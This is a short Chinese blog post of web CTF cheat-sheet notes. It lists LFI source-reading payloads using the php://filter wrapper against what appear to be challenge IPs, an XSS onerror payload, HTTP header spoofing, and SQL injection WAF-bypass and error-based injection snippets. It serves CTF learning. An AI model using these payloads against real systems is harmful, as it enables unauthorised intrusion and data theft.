web杂记

WateranFire

于 2017-08-23 20:16:42 发布

阅读量439

点赞数

分类专栏： web 文章标签： web

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/WateranFire/article/details/77511327

版权

web 专栏收录该内容

1 篇文章 0 订阅

订阅专栏

虽然是个web渣渣，不过还是记下一些小知识吧！
找源码：
1. 利用PHP协议读取所有源码，不太懂原理
http://218.76.35.75:20115/?page=php://filter/read=convert.base64-encode/resource=main
上面这个是看main.php的源码，得到的是base64形式,可以换成index看看；
http://218.76.35.74:20129/include.php?file=php://filter/read=convert.base64-encode/resource=include
这是看include.php的源码
2. 备份文件index.php~,.index.php.swp, index.php.swp, index.php.bak。其中还原命令为

 vim -r index.php

XSS:
1.onerror:

> 123' onerror=alert(document.domain)

robots.txt可以看到一些东西

爆路径：

/file_manager_json.php?path=/

访问页面时
修改来自的网址——改Referer头
修改ip——改/增 X-forwarded-for头
修改UA:
例如题目要求修改为IOS99:
User-Agent:Mozilla/5.0 (iPhone; CPU iPhone OS 99 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4

作者：十二岁顽童
链接：https://www.jianshu.com/p/1b5e0be28645
來源：简书
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

sql注入：
关键字被过滤——
substr还有逗号被过滤可以用
mid（xxxx from 1 for 1）来逐字符判断
空格过滤：/**/或%0a
andand
/*and*/
/*!and*/
盲注：
当mid substr被waf过滤，可以使用regexp ‘^xxx’来正则匹配爆破字符
报错注入：
updatexml(1,concat(0x3a,(select xxxx)),1)
可以通过/**/拼接来注释掉中间的语句来实现一些操作

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
web杂记

虽然是个web渣渣，不过还是记下一些小知识吧！找源码： 1. 利用PHP协议读取所有源码，不太懂原理 http://218.76.35.75:20115/?page=php://filter/read=convert.base64-encode/resource=main 上面这个是看main.php的源码，得到的是base64形式,可以换成index看看； http://218.7
复制链接

扫一扫

专栏目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。